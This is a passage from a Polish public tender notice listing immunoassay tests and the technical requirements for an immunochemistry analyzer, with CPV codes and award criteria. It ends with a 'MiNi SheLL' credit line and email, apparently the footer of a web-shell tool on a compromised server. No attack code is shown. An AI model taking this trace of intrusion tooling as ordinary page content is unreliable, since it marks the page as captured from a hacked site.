14.Anty TG (1 op a 30)	5
15.Borelioza IgM (1 op a 60)	5
16.Borelioza IgG (1 op a 60)	5
17.Ab - HCV (1 op a 60)	5
18.H. Pylori (1 op. a 30)	9

Załącznik 6b
Wymagane parametry techniczne
Analizator do immunochemii szt. 1
1. Producent	
2. Nazwa i typ
3.Analizator nastołowy wieloparametrowy.	
4.Automatyczna krzywa kalibracyjna - w postaci kodu kreskowego.
5.Rekalibracja nie częściej niż raz na 14 dni.
6.Optymalizacja kosztów oznaczania (jednakowy koszt dla pojedynczego oznaczenia i oznaczeń w serii).	
7.Stała gotowość do pracy aparatu.
8.Aparat nie wymagający codziennej obsługi (używania buforów, płynów płuczących, kalibracji, czyszczenia) - stała gotowość do pracy aparatu.	
9.Wykluczenie możliwości kontaminacji (przeniesienia oznaczonego składnika pomiędzy próbkami) - aparat bezigłowy.	
10.Możliwość jednoczesnego oznaczenia różnych parametrów dla tego samego pacjenta.
11.Pojemność analizatora min. 12 testów.	
12.Kompletne zestawy odczynnikowe zawierające kalibratory i kontrole.	
13.Trwałość odczynników do wykonywania oznaczeń po otwarciu opakowania nie krótsza niż trwałość podana na opakowaniu jako termin ważności.	
14.Oferowany analizator musi być objęty gwarancją i serwisem technicznym przez  36 miesiące.
15.Rok budowy aparatu -  nie starszy niż 2009 rok.	
16.Analizator musi posiadać dopuszczenie do obrotu zgodnie z ustawą z dnia z dnia 20 maja 2010 roku o wyrobach medycznych  (Dz. U. z 2015 roku, poz. 876)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.80-5, 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com